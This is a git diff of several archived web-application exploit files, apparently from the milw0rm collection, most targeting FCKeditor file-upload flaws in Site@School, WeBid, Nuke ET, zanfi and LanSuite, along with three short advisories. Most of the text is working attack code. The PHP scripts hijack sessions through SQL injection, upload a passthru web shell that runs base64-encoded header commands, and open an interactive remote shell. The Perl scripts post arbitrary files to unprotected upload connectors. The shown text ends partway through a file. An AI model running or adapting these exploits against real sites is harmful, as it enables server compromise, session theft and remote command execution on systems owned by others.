+		$payload .= "Content-Disposition: form-data; name=\"new_file\"; filename=\"test.php{$ext}\"\r\n\r\n";
+		$payload .= "<?php \${error_reporting(0)}.\${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))} ?>\r\n";
+		$payload .= "--o0oOo0o--\r\n";
+
+		$packet  = "POST {$path}starnet/editors/fckeditor/editor/filemanager/sas/browser.php?option=upload HTTP/1.0\r\n";
+		$packet .= "Host: {$host}\r\n";
+		$packet .= "Cookie: PHPSESSID={$sid}\r\n";
+		$packet .= "Content-Length: ".strlen($payload)."\r\n";
+		$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";
+		$packet .= "Connection: close\r\n\r\n";
+		$packet .= $payload;
+
+		if (preg_match("/File upload error/i", http_send($host, $packet))) die("\n[-] Upload failed!\n");
+		
+		$packet  = "GET {$path}starnet/media/gallery/test.php{$ext} HTTP/1.0\r\n";
+		$packet .= "Host: {$host}\r\n";
+		$packet .= "Connection: close\r\n\r\n";
+		$html    = http_send($host, $packet);
+		
+		if (!eregi("print", $html) and eregi("_code_", $html)) return $ext;
+		
+		sleep(1);
+	}
+	
+	return false;
+}
+
+function get_sid()
+{
+	global $host, $path, $prefix;
+	
+	// thanks to rgod for giving to understand that this isn't blind injetion...r.i.p. my friend!
+	$sql =  "'/**/UNION/**/SELECT/**/CONCAT(CHAR(0xFF),ses_id,CHAR(0xFF),CHAR(0x27)),1,1/**/" .
+		"FROM/**/{$prefix}_sessions/**/WHERE/**/ses_value/**/LIKE/**/'%sessioncode%'%23";
+
+	$packet  = "GET {$path}starnet/addons/slideshow_full.php?album_name={$sql} HTTP/1.0\r\n";
+	$packet .= "Host: {$host}\r\n";
+	$packet .= "Connection: close\r\n\r\n";
+
+	$pieces = explode(chr(0xFF), http_send($host, $packet));
+	return $pieces[1];
+}
+
+function check_target()
+{
+	global $host, $path, $prefix;
+	
+	print "\n[-] Checking {$host}...";
+	
+	$packet  = "GET {$path}starnet/addons/slideshow_full.php?album_name=%27 HTTP/1.0\r\n";
+	$packet .= "Host: {$host}\r\n";
+	$packet .= "Connection: close\r\n\r\n";
+	
+	if (preg_match("/FROM (.*)_m/", http_send($host, $packet), $match)) print "vulnerable!\n";
+	else die("not vulnerable!\n\n[-] Exploit failed...probably magic_quotes_gpc = on\n");
+	
+	$prefix = $match[1];
+}
+
+print "\n+-----------------------------------------------------------------------+";
+print "\n| Site@School <= 2.4.10 Session Hijacking / File Upload Exploit by EgiX |";
+print "\n+-----------------------------------------------------------------------+\n";
+
+if ($argc < 3)
+{
+	print "\nUsage...: php $argv[0] host path \n";
+	print "\nhost....: target server (ip/hostname)";
+	print "\npath....: path to sas directory\n";
+	die();
+}
+
+$host = $argv[1];
+$path = $argv[2];
+
+check_target();
+$sid = get_sid();
+
+if (empty($sid)) die("\n[-] Session id not found! Try later...\n");
+else print "\n[-] Hijacking with sid {$sid}\n";
+
+if (!($ext = upload())) die("\n[-] Exploit failed...\n");
+else print "\n[-] Shell uploaded...starting it!\n";
+
+while(1)
+{
+	print "\nsas-shell# ";
+	$cmd = trim(fgets(STDIN));
+	if ($cmd != "exit")
+	{
+		$packet = "GET {$path}starnet/media/gallery/test.php{$ext} HTTP/1.0\r\n";
+		$packet.= "Host: {$host}\r\n";
+		$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
+		$packet.= "Connection: close\r\n\r\n";
+		$output = http_send($host, $packet);
+		if (!preg_match("/_code_/", $output)) die("\n[-] Exploit failed...\n");
+		$shell  = explode("_code_", $output);
+		print "\n{$shell[1]}";
+	}
+	else break;
+}
+
+?>
+
+# milw0rm.com [2008-07-04]
diff --git a/platforms/php/webapps/6344.php b/platforms/php/webapps/6344.php
index 28f96ad57..be299924a 100755
--- a/platforms/php/webapps/6344.php
+++ b/platforms/php/webapps/6344.php
@@ -1,110 +1,110 @@
-<?php
-/*
- -----------------------------------------------------------------
- WeBid v0.5.4 (fckeditor) Remote Arbitrary File Upload Exploit
- -----------------------------------------------------------------
- 
- author...: Stack
- 
- [-] vulnerable code in /fck/editor/filemanager/browser/mcpuk/connectors/php/config.php
- 
- 121. //File Area
- 122. $fckphp_config['ResourceAreas']['File'] =array(
- 123.  
- 124.  //Files(identified by extension) that may be uploaded to this area
- 125.  'AllowedExtensions' => array("zip","doc","xls","pdf","rtf","csv","jpg","gif","jpeg","png","avi","mpg","mpeg","swf","fla"),
- 
- with a default configuration of this script, an attacker might be able to upload arbitrary
- files containing malicious PHP code due to multiple file extensions isn't properly checked
-*/
-error_reporting(0);
-set_time_limit(0);
-ini_set("default_socket_timeout", 5);
-function http_send($host, $packet)
-{
- $sock = fsockopen($host, 80);
- while (!$sock)
- {
-  print "\n[-] No response from {$host}:80 Trying again...";
-  $sock = fsockopen($host, 80);
- }
- fputs($sock, $packet);
- while (!feof($sock)) $resp .= fread($sock, 1024);
- fclose($sock);
- return $resp;
-}
-function upload()
-{
- global $host, $path;
- 
- $connector = "fck/editor/filemanager/browser/mcpuk/connectors/php/connector.php";
- $file_ext  = array("zip", "swf", "fla", "doc", "xls", "rtf", "csv");
- 
- foreach ($file_ext as $ext)
- {
-  print "\n[-] Trying to upload with .{$ext} extension...";
-  
-  $data  = "--12345\r\n";
-  $data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"sh.php.{$ext}\"\r\n";
-  $data .= "Content-Type: application/octet-stream\r\n\r\n";
-  $data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\r\n";
-  $data .= "--12345--\r\n";
-  
-  $packet  = "POST {$path}{$connector}?Command=FileUpload&CurrentFolder={$path} HTTP/1.0\r\n";
-  $packet .= "Host: {$host}\r\n";
-  $packet .= "Content-Length: ".strlen($data)."\r\n";
-  $packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
-  $packet .= "Connection: close\r\n\r\n";
-  $packet .= $data;
-  
-  preg_match("/OnUploadCompleted\((.*),'(.*)'\)/i", http_send($host, $packet), $html);
-  
-  if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]}: {$html[2]})\n");
-  
-  $packet  = "GET {$path}sh.php.{$ext} HTTP/1.0\r\n";
-  $packet .= "Host: {$host}\r\n";
-  $packet .= "Connection: close\r\n\r\n";
-  $html    = http_send($host, $packet);
-  
-  if (!eregi("print", $html) and eregi("_code_", $html)) return $ext;
-  
-  sleep(1);
- }
- 
- return false;
-}
-print "\n+--------------------------------------------------------------------+";
-print "\n|WeBid v0.5.4 (fckeditor) Remote Arbitrary File Upload Exploit by Stack|";
-print "\n+--------------------------------------------------------------------+\n";
-if ($argc < 3)
-{
- print "\nUsage......: php $argv[0] host path\n";
- print "\nExample....: php $argv[0] localhost /";
- print "\nExample....: php $argv[0] localhost /WeBid/\n";
- die();
-}
-$host = $argv[1];
-$path = $argv[2];
-if (!($ext = upload())) die("\n\n[-] Exploit failed...\n");
-else print "\n[-] Shell uploaded...starting it!\n";
-define(STDIN, fopen("php://stdin", "r"));
-while(1)
-{
- print "\nStack-shell# ";
- $cmd = trim(fgets(STDIN));
- if ($cmd != "exit")
- {
-  $packet = "GET {$path}sh.php.{$ext} HTTP/1.0\r\n";
-  $packet.= "Host: {$host}\r\n";
-  $packet.= "Cmd: ".base64_encode($cmd)."\r\n";
-  $packet.= "Connection: close\r\n\r\n";
-  $html   = http_send($host, $packet);
-  if (!eregi("_code_", $html)) die("\n[-] Exploit failed...\n");
-  $shell = explode("_code_", $html);
-  print "\n{$shell[1]}";
- }
- else break;
-}
-?>
-
-# milw0rm.com [2008-09-01]
+<?php
+/*
+ -----------------------------------------------------------------
+ WeBid v0.5.4 (fckeditor) Remote Arbitrary File Upload Exploit
+ -----------------------------------------------------------------
+ 
+ author...: Stack
+ 
+ [-] vulnerable code in /fck/editor/filemanager/browser/mcpuk/connectors/php/config.php
+ 
+ 121. //File Area
+ 122. $fckphp_config['ResourceAreas']['File'] =array(
+ 123.  
+ 124.  //Files(identified by extension) that may be uploaded to this area
+ 125.  'AllowedExtensions' => array("zip","doc","xls","pdf","rtf","csv","jpg","gif","jpeg","png","avi","mpg","mpeg","swf","fla"),
+ 
+ with a default configuration of this script, an attacker might be able to upload arbitrary
+ files containing malicious PHP code due to multiple file extensions isn't properly checked
+*/
+error_reporting(0);
+set_time_limit(0);
+ini_set("default_socket_timeout", 5);
+function http_send($host, $packet)
+{
+ $sock = fsockopen($host, 80);
+ while (!$sock)
+ {
+  print "\n[-] No response from {$host}:80 Trying again...";
+  $sock = fsockopen($host, 80);
+ }
+ fputs($sock, $packet);
+ while (!feof($sock)) $resp .= fread($sock, 1024);
+ fclose($sock);
+ return $resp;
+}
+function upload()
+{
+ global $host, $path;
+ 
+ $connector = "fck/editor/filemanager/browser/mcpuk/connectors/php/connector.php";
+ $file_ext  = array("zip", "swf", "fla", "doc", "xls", "rtf", "csv");
+ 
+ foreach ($file_ext as $ext)
+ {
+  print "\n[-] Trying to upload with .{$ext} extension...";
+  
+  $data  = "--12345\r\n";
+  $data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"sh.php.{$ext}\"\r\n";
+  $data .= "Content-Type: application/octet-stream\r\n\r\n";
+  $data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\r\n";
+  $data .= "--12345--\r\n";
+  
+  $packet  = "POST {$path}{$connector}?Command=FileUpload&CurrentFolder={$path} HTTP/1.0\r\n";
+  $packet .= "Host: {$host}\r\n";
+  $packet .= "Content-Length: ".strlen($data)."\r\n";
+  $packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
+  $packet .= "Connection: close\r\n\r\n";
+  $packet .= $data;
+  
+  preg_match("/OnUploadCompleted\((.*),'(.*)'\)/i", http_send($host, $packet), $html);
+  
+  if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]}: {$html[2]})\n");
+  
+  $packet  = "GET {$path}sh.php.{$ext} HTTP/1.0\r\n";
+  $packet .= "Host: {$host}\r\n";
+  $packet .= "Connection: close\r\n\r\n";
+  $html    = http_send($host, $packet);
+  
+  if (!eregi("print", $html) and eregi("_code_", $html)) return $ext;
+  
+  sleep(1);
+ }
+ 
+ return false;
+}
+print "\n+--------------------------------------------------------------------+";
+print "\n|WeBid v0.5.4 (fckeditor) Remote Arbitrary File Upload Exploit by Stack|";
+print "\n+--------------------------------------------------------------------+\n";
+if ($argc < 3)
+{
+ print "\nUsage......: php $argv[0] host path\n";
+ print "\nExample....: php $argv[0] localhost /";
+ print "\nExample....: php $argv[0] localhost /WeBid/\n";
+ die();
+}
+$host = $argv[1];
+$path = $argv[2];
+if (!($ext = upload())) die("\n\n[-] Exploit failed...\n");
+else print "\n[-] Shell uploaded...starting it!\n";
+define(STDIN, fopen("php://stdin", "r"));
+while(1)
+{
+ print "\nStack-shell# ";
+ $cmd = trim(fgets(STDIN));
+ if ($cmd != "exit")
+ {
+  $packet = "GET {$path}sh.php.{$ext} HTTP/1.0\r\n";
+  $packet.= "Host: {$host}\r\n";
+  $packet.= "Cmd: ".base64_encode($cmd)."\r\n";
+  $packet.= "Connection: close\r\n\r\n";
+  $html   = http_send($host, $packet);
+  if (!eregi("_code_", $html)) die("\n[-] Exploit failed...\n");
+  $shell = explode("_code_", $html);
+  print "\n{$shell[1]}";
+ }
+ else break;
+}
+?>
+
+# milw0rm.com [2008-09-01]
diff --git a/platforms/php/webapps/6360.txt b/platforms/php/webapps/6360.txt
index 6459a2d07..0b0d362f7 100755
--- a/platforms/php/webapps/6360.txt
+++ b/platforms/php/webapps/6360.txt
@@ -1,53 +1,53 @@
-########################## www.BugReport.ir #######################################
-#
-#        AmnPardaz Security Research Team
-#
-# Title: TransLucid 1.75 (fckeditor) Remote Arbitrary File Upload
-# Vendor: www.translucidonline.com
-# Vulnerable Version: 1.75 (prior versions also may be affected)
-# Exploitation: Remote with browser
-# Exploit: Available
-# Impact: Medium
-# Fix: N/A
-# Original Advisory: http://www.bugreport.ir/index_51.htm
-###################################################################################
-
-####################
-- Description:
-####################
-
-transLucid is the simple website publishing system with which anyone can create and maintain web content, in multiple languages and based on a
-growing list of ready-made, professional layouts.
-
-####################
-- Vulnerability:
-####################
-
-+--> Fckeditor Arbitrary File Upload
-
-The problem is that it is possible to upload files to a location inside the web root "/userdata" via the
-
-/editors/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php script.
-
-
-####################
-- Exploit:
-####################
-
-http://example.com/transLucid_175/editors/FCKeditor/editor/filemanager/browser/default/connectors/test.html
-
-####################
-- Solution:
-####################
-
-Restrict and grant only trusted users access to the resources.
-
-####################
-- Credit :
-####################
-AmnPardaz Security Research & Penetration Testing Group
-Contact: admin[4t}bugreport{d0t]ir
-WwW.BugReport.ir
-WwW.AmnPardaz.com
-
-# milw0rm.com [2008-09-03]
+########################## www.BugReport.ir #######################################
+#
+#        AmnPardaz Security Research Team
+#
+# Title: TransLucid 1.75 (fckeditor) Remote Arbitrary File Upload
+# Vendor: www.translucidonline.com
+# Vulnerable Version: 1.75 (prior versions also may be affected)
+# Exploitation: Remote with browser
+# Exploit: Available
+# Impact: Medium
+# Fix: N/A
+# Original Advisory: http://www.bugreport.ir/index_51.htm
+###################################################################################
+
+####################
+- Description:
+####################
+
+transLucid is the simple website publishing system with which anyone can create and maintain web content, in multiple languages and based on a
+growing list of ready-made, professional layouts.
+
+####################
+- Vulnerability:
+####################
+
++--> Fckeditor Arbitrary File Upload
+
+The problem is that it is possible to upload files to a location inside the web root "/userdata" via the
+
+/editors/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php script.
+
+
+####################
+- Exploit:
+####################
+
+http://example.com/transLucid_175/editors/FCKeditor/editor/filemanager/browser/default/connectors/test.html
+
+####################
+- Solution:
+####################
+
+Restrict and grant only trusted users access to the resources.
+
+####################
+- Credit :
+####################
+AmnPardaz Security Research & Penetration Testing Group
+Contact: admin[4t}bugreport{d0t]ir
+WwW.BugReport.ir
+WwW.AmnPardaz.com
+
+# milw0rm.com [2008-09-03]
diff --git a/platforms/php/webapps/6410.txt b/platforms/php/webapps/6410.txt
index c14031dcf..e9ff4d002 100755
--- a/platforms/php/webapps/6410.txt
+++ b/platforms/php/webapps/6410.txt
@@ -1,46 +1,46 @@
-########################################################################
-#
-#                          S4rK3VT Hacking TEAM
-#
-# Title: KimWebsite (fckeditor) Remote Arbitrary File Upload
-# Vendor: http://sourceforge.net/project/showfiles.php?group_id=196819
-# discover by : Ciph3r
-# We Are : Ciph3r & Rake
-# Ciph3r_blackhat@yahoo.com
-# Impact: Medium
-# Fix: N/A
-# Expl0ters Security TEAM ==>> www.Expl0iters.ir
-########################################################################
-
-####################
-- Vulnerability:
-####################
-
-+--> Fckeditor Arbitrary File Upload
-
-The problem is that it is possible to upload files to a location inside the web root "/userdata" via the
-
-[path]/fck/editor/filemanager/upload/php/upload.php script.
-
-
-####################
-- Exploit:
-####################
-
-http://example.com/[path]/fck/editor/filemanager/upload/test.html
-
-####################
-- Solution:
-####################
-
-Restrict and grant only trusted users access to the resources.
-
-####################
-- GreTzZ :
-####################
-
-Iranian Hacker & Kurdish Security TEAM & My Mother
-
-####################
-
-# milw0rm.com [2008-09-09]
+########################################################################
+#
+#                          S4rK3VT Hacking TEAM
+#
+# Title: KimWebsite (fckeditor) Remote Arbitrary File Upload
+# Vendor: http://sourceforge.net/project/showfiles.php?group_id=196819
+# discover by : Ciph3r
+# We Are : Ciph3r & Rake
+# Ciph3r_blackhat@yahoo.com
+# Impact: Medium
+# Fix: N/A
+# Expl0ters Security TEAM ==>> www.Expl0iters.ir
+########################################################################
+
+####################
+- Vulnerability:
+####################
+
++--> Fckeditor Arbitrary File Upload
+
+The problem is that it is possible to upload files to a location inside the web root "/userdata" via the
+
+[path]/fck/editor/filemanager/upload/php/upload.php script.
+
+
+####################
+- Exploit:
+####################
+
+http://example.com/[path]/fck/editor/filemanager/upload/test.html
+
+####################
+- Solution:
+####################
+
+Restrict and grant only trusted users access to the resources.
+
+####################
+- GreTzZ :
+####################
+
+Iranian Hacker & Kurdish Security TEAM & My Mother
+
+####################
+
+# milw0rm.com [2008-09-09]
diff --git a/platforms/php/webapps/6419.txt b/platforms/php/webapps/6419.txt
index 6a8739034..f7f4bac53 100755
--- a/platforms/php/webapps/6419.txt
+++ b/platforms/php/webapps/6419.txt
@@ -1,42 +1,42 @@
-#!/usr/bin/perl
-use strict;
-use warnings;
-use LWP::UserAgent;
-use HTTP::Request::Common;
-print <<INTRO;
-+++++++++++++++++++++++++++++++++++++++++++++++++++++
-+zanfi 1.2 Arbitrary File Upload  xpl               +
-+                                                   +
-+Discovered by :reptil                              +
-+                                                   +
-+                                                   +
-+++++++++++++++++++++++++++++++++++++++++++++++++++++
-# Reptil  
-INTRO
-print "Enter URL(ie: http://site.com): ";
-    chomp(my $url=<STDIN>);
-   
-print "Enter File Path(path to local file to upload): ";
-    chomp(my $file=<STDIN>);
-my $ua = LWP::UserAgent->new;
-my $re = $ua->request(POST $url.'/editor/filemanager/upload/php/upload.php',
-                      Content_Type => 'form-data',
-                      Content      => [ NewFile => $file ] );
-if($re->is_success) {
-    if( index($re->content, "Disabled") != -1 ) { print "Exploit Successfull! File Uploaded!\n"; }
-    else { print "File Upload Is Disabled! Failed!\n"; }
-} else { print "HTTP Request Failed!\n"; }
-exit;
-
-##############################################################
-##############################################################
-*
-*you can use this and upload files ! 
-*
-*http://www.site.com/editor/filemanager/upload/test.html
-*
-*http://www.zanfi.nl
-##############################################################
-##############################################################
-
-# milw0rm.com [2008-09-10]
+#!/usr/bin/perl
+use strict;
+use warnings;
+use LWP::UserAgent;
+use HTTP::Request::Common;
+print <<INTRO;
++++++++++++++++++++++++++++++++++++++++++++++++++++++
++zanfi 1.2 Arbitrary File Upload  xpl               +
++                                                   +
++Discovered by :reptil                              +
++                                                   +
++                                                   +
++++++++++++++++++++++++++++++++++++++++++++++++++++++
+# Reptil  
+INTRO
+print "Enter URL(ie: http://site.com): ";
+    chomp(my $url=<STDIN>);
+   
+print "Enter File Path(path to local file to upload): ";
+    chomp(my $file=<STDIN>);
+my $ua = LWP::UserAgent->new;
+my $re = $ua->request(POST $url.'/editor/filemanager/upload/php/upload.php',
+                      Content_Type => 'form-data',
+                      Content      => [ NewFile => $file ] );
+if($re->is_success) {
+    if( index($re->content, "Disabled") != -1 ) { print "Exploit Successfull! File Uploaded!\n"; }
+    else { print "File Upload Is Disabled! Failed!\n"; }
+} else { print "HTTP Request Failed!\n"; }
+exit;
+
+##############################################################
+##############################################################
+*
+*you can use this and upload files ! 
+*
+*http://www.site.com/editor/filemanager/upload/test.html
+*
+*http://www.zanfi.nl
+##############################################################
+##############################################################
+
+# milw0rm.com [2008-09-10]
diff --git a/platforms/php/webapps/6448.txt b/platforms/php/webapps/6448.txt
index b2bf9b2c8..234c4793b 100755
--- a/platforms/php/webapps/6448.txt
+++ b/platforms/php/webapps/6448.txt
@@ -1,47 +1,47 @@
-########################################################################
-#
-#                                 S.W.A.T.
-#
-# Title: WebPortal <= 0.7.4 (fckeditor) Remote Arbitrary File Upload
-#
-# Vendor: http://webportal.ivanoculmine.com/download.php?mid=14
-#
-# Discover by : S.W.A.T.
-#
-# svvateam@yahoo.com
-#
-# Impact: Medium
-#
-# Fix: Disable It In The Config File ;)
-#
-# Site: wWw.SvvaT.IR
-#
-########################################################################
-
-####################
-- Exploit:
-####################
-
-http://example.com/[path]/libraries/htmleditor/editor/filemanager/upload/test.html
-
-####################
-- Demo:
-####################
-
-http://demos.ivanoculmine.com/webportal/libraries/htmleditor/editor/filemanager/upload/test.html
-
-####################
-- Solution:
-####################
-
-Restrict and grant only trusted users access to the resources.
-
-####################
-- GreTzZ :
-####################
-
-All My Friend's , Str0ke
-
-####################
-
-# milw0rm.com [2008-09-12]
+########################################################################
+#
+#                                 S.W.A.T.
+#
+# Title: WebPortal <= 0.7.4 (fckeditor) Remote Arbitrary File Upload
+#
+# Vendor: http://webportal.ivanoculmine.com/download.php?mid=14
+#
+# Discover by : S.W.A.T.
+#
+# svvateam@yahoo.com
+#
+# Impact: Medium
+#
+# Fix: Disable It In The Config File ;)
+#
+# Site: wWw.SvvaT.IR
+#
+########################################################################
+
+####################
+- Exploit:
+####################
+
+http://example.com/[path]/libraries/htmleditor/editor/filemanager/upload/test.html
+
+####################
+- Demo:
+####################
+
+http://demos.ivanoculmine.com/webportal/libraries/htmleditor/editor/filemanager/upload/test.html
+
+####################
+- Solution:
+####################
+
+Restrict and grant only trusted users access to the resources.
+
+####################
+- GreTzZ :
+####################
+
+All My Friend's , Str0ke
+
+####################
+
+# milw0rm.com [2008-09-12]
diff --git a/platforms/php/webapps/6573.pl b/platforms/php/webapps/6573.pl
index affbcc4ed..45283fca6 100755
--- a/platforms/php/webapps/6573.pl
+++ b/platforms/php/webapps/6573.pl
@@ -1,28 +1,28 @@
-#!/usr/bin/perl
-use strict;
-use warnings;
-use LWP::UserAgent;
-use HTTP::Request::Common;
-print <<INTRO;
-+++++++++++++++++++++++++++++++++++++++++++++++++++++
-+ LanSuite 3.3.2 (fckeditor) Arbitrary File Upload  +
-+                                                   +
-+                   By: Stack                       +
-+++++++++++++++++++++++++++++++++++++++++++++++++++++
-INTRO
-print "Enter URL(ie: http://site.com): ";
-    chomp(my $url=<STDIN>);
-  
-print "Enter File Path(path to local file to upload): ";
-    chomp(my $file=<STDIN>);
-my $ua = LWP::UserAgent->new;
-my $re = $ua->request(POST $url.'/FCKeditor/editor/filemanager/upload/php/upload.php',
-                      Content_Type => 'form-data',
-                      Content      => [ NewFile => $file ] );
-if($re->is_success) {
-    if( index($re->content, "Disabled") != -1 ) { print "Exploit Successfull! File Uploaded!\n"; }
-    else { print "File Upload Is Disabled! Failed!\n"; }
-} else { print "HTTP Request Failed!\n"; }
-exit;
-
-# milw0rm.com [2008-09-25]
+#!/usr/bin/perl
+use strict;
+use warnings;
+use LWP::UserAgent;
+use HTTP::Request::Common;
+print <<INTRO;
++++++++++++++++++++++++++++++++++++++++++++++++++++++
++ LanSuite 3.3.2 (fckeditor) Arbitrary File Upload  +
++                                                   +
++                   By: Stack                       +
++++++++++++++++++++++++++++++++++++++++++++++++++++++
+INTRO
+print "Enter URL(ie: http://site.com): ";
+    chomp(my $url=<STDIN>);
+  
+print "Enter File Path(path to local file to upload): ";
+    chomp(my $file=<STDIN>);
+my $ua = LWP::UserAgent->new;
+my $re = $ua->request(POST $url.'/FCKeditor/editor/filemanager/upload/php/upload.php',
+                      Content_Type => 'form-data',
+                      Content      => [ NewFile => $file ] );
+if($re->is_success) {
+    if( index($re->content, "Disabled") != -1 ) { print "Exploit Successfull! File Uploaded!\n"; }
+    else { print "File Upload Is Disabled! Failed!\n"; }
+} else { print "HTTP Request Failed!\n"; }
+exit;
+
+# milw0rm.com [2008-09-25]
diff --git a/platforms/php/webapps/6783.php b/platforms/php/webapps/6783.php
index fc0e9ed76..f38221f51 100755
--- a/platforms/php/webapps/6783.php
+++ b/platforms/php/webapps/6783.php
@@ -1,132 +1,132 @@
-<?php
-
-/*
-	---------------------------------------------------------------
-	Nuke ET <= 3.4 (fckeditor) Remote Arbitrary File Upload Exploit
-	---------------------------------------------------------------
-	
-	author...: EgiX
-	mail.....: n0b0d13s[at]gmail[dot]com
-	
-	link.....: http://www.truzone.org/
-	
-	This PoC was written for educational purpose. Use it at your own risk.
-	Author will be not responsible for any damage.
-	
-	[-] vulnerable code in /nuke/FCKeditor/editor/filemanager/browser/default/connectors/php/commands.php
-	
-	147.	function FileUpload( $resourceType, $currentFolder )
-	148.	{
-	149.		$sErrorNumber = '0' ;
-	150.		$sFileName = '' ;
-	151.	
-	152.		if ( isset( $_FILES['NewFile'] ) && !is_null( $_FILES['NewFile']['tmp_name'] ) )
-	153.		{
-	154.			$oFile = $_FILES['NewFile'] ;
-	155.	
-	156.			// Map the virtual path to the local server path.
-	157.			$sServerDir = ServerMapFolder( $resourceType, $currentFolder ) ;
-	158.	
-	159.			// Get the uploaded file name.
-	160.			$sFileName = $oFile['name'] ;
-	161.			$sOriginalFileName = $sFileName ;
-	162.			// Security fix by truzone 01-15-2006
-	163.			//$sExtension = substr( $sFileName, ( strrpos($sFileName, '.') + 1 ) ) ;
-	164.			//$sExtension = strtolower( $sExtension ) ;
-	165.	
-	166.			if(extension_loaded("mime_magic")){
-	167.			$sExtension = mime_content_type($oFile['tmp_name']);
-	168.			}else{
-	169.			$sExtension = $oFile['type'];
-	170.			}
-	171.			// en of security fix by truzone 01-15-2006
-	172.			global $Config ;
-	173.	
-	174.			$arAllowed	= $Config['AllowedExtensions'][$resourceType] ;
-	175.			$arDenied	= $Config['DeniedExtensions'][$resourceType] ;
-
-	An attacker might be able to upload arbitrary files containing malicious PHP code due to the code
-	near lines 166-170 will check only the MIME type of the upload request, that can be easily spoofed!
-*/
-
-error_reporting(0);
-set_time_limit(0);
-ini_set("default_socket_timeout", 5);
-
-define(STDIN, fopen("php://stdin", "r"));
-
-function http_send($host, $packet)
-{
-	$sock = fsockopen($host, 80);
-	while (!$sock)
-	{
-		print "\n[-] No response from {$host}:80 Trying again...";
-		$sock = fsockopen($host, 80);
-	}
-	fputs($sock, $packet);
-	while (!feof($sock)) $resp .= fread($sock, 1024);
-	fclose($sock);
-	return $resp;
-}
-
-function connector_response($html)
-{
-	return (preg_match("/OnUploadCompleted\((\d),\"(.*)\"\)/", $html, $match) && in_array($match[1], array(0, 201)));
-}
-
-print "\n+------------------------------------------------------------------+";
-print "\n| Nuke ET <= 3.4 (fckeditor) Arbitrary File Upload Exploit by EgiX |";
-print "\n+------------------------------------------------------------------+\n";
-
-if ($argc < 3)
-{
-	print "\nUsage......: php $argv[0] host path";
-	print "\nExample....: php $argv[0] localhost /";
-	print "\nExample....: php $argv[0] localhost /nukeet/\n";
-	die();
-}
-
-$host = $argv[1];
-$path = ereg_replace("(/){2,}", "/", $argv[2]);
-
-$filename  = md5(time()).".php";
-$connector = "FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php";
-
-$payload  = "--o0oOo0o\r\n";
-$payload .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"{$filename}\"\r\n";
-$payload .= "Content-Type: application/zip\r\n\r\n";
-$payload .= "PK\003\004<?php error_reporting(0);print(\"_code_\\n\");passthru(base64_decode(\$_SERVER[HTTP_CMD])); ?>\n";
-$payload .= "--o0oOo0o--\r\n";
-
-$packet	 = "POST {$path}{$connector}?Command=FileUpload&Type=File&CurrentFolder=%2f HTTP/1.0\r\n";
-$packet	.= "Host: {$host}\r\n";
-$packet .= "Content-Length: ".strlen($payload)."\r\n";
-$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";
-$packet .= "Connection: close\r\n\r\n";
-$packet .= $payload;
-
-if (!connector_response(http_send($host, $packet))) die("\n[-] Upload failed!\n");
-else print "\n[-] Shell uploaded to {$filename}...starting it!\n";
-
-$path .= str_repeat("../", substr_count($path, "/") - 1) . "UserFiles/File/"; // come back to the document root 
-
-$packet  = "GET {$path}{$filename} HTTP/1.0\r\n";
-$packet .= "Host: {$host}\r\n";
-$packet .= "Cmd: %s\r\n";
-$packet .= "Connection: close\r\n\r\n";
-
-while(1)
-{
-	print "\nnukeet-shell# ";
-	$cmd = trim(fgets(STDIN));
-	if ($cmd != "exit")
-	{
-		$response = http_send($host, sprintf($packet, base64_encode($cmd)));
-		preg_match("/_code_/", $response) ? print array_pop(explode("_code_", $response)) : die("\n[-] Exploit failed...\n");
-	}
-	else break;
-}
-
-?>
-
-# milw0rm.com [2008-10-18]
+<?php
+
+/*
+	---------------------------------------------------------------
+	Nuke ET <= 3.4 (fckeditor) Remote Arbitrary File Upload Exploit
+	---------------------------------------------------------------
+	
+	author...: EgiX
+	mail.....: n0b0d13s[at]gmail[dot]com
+	
+	link.....: http://www.truzone.org/
+	
+	This PoC was written for educational purpose. Use it at your own risk.
+	Author will be not responsible for any damage.
+	
+	[-] vulnerable code in /nuke/FCKeditor/editor/filemanager/browser/default/connectors/php/commands.php
+	
+	147.	function FileUpload( $resourceType, $currentFolder )
+	148.	{
+	149.		$sErrorNumber = '0' ;
+	150.		$sFileName = '' ;
+	151.	
+	152.		if ( isset( $_FILES['NewFile'] ) && !is_null( $_FILES['NewFile']['tmp_name'] ) )
+	153.		{
+	154.			$oFile = $_FILES['NewFile'] ;
+	155.	
+	156.			// Map the virtual path to the local server path.
+	157.			$sServerDir = ServerMapFolder( $resourceType, $currentFolder ) ;
+	158.	
+	159.			// Get the uploaded file name.
+	160.			$sFileName = $oFile['name'] ;
+	161.			$sOriginalFileName = $sFileName ;
+	162.			// Security fix by truzone 01-15-2006
+	163.			//$sExtension = substr( $sFileName, ( strrpos($sFileName, '.') + 1 ) ) ;
+	164.			//$sExtension = strtolower( $sExtension ) ;
+	165.	
+	166.			if(extension_loaded("mime_magic")){
+	167.			$sExtension = mime_content_type($oFile['tmp_name']);
+	168.			}else{
+	169.			$sExtension = $oFile['type'];
+	170.			}
+	171.			// en of security fix by truzone 01-15-2006
+	172.			global $Config ;
+	173.	
+	174.			$arAllowed	= $Config['AllowedExtensions'][$resourceType] ;
+	175.			$arDenied	= $Config['DeniedExtensions'][$resourceType] ;
+
+	An attacker might be able to upload arbitrary files containing malicious PHP code due to the code
+	near lines 166-170 will check only the MIME type of the upload request, that can be easily spoofed!
+*/
+
+error_reporting(0);
+set_time_limit(0);
+ini_set("default_socket_timeout", 5);
+
+define(STDIN, fopen("php://stdin", "r"));
+
+function http_send($host, $packet)
+{
+	$sock = fsockopen($host, 80);
+	while (!$sock)
+	{
+		print "\n[-] No response from {$host}:80 Trying again...";
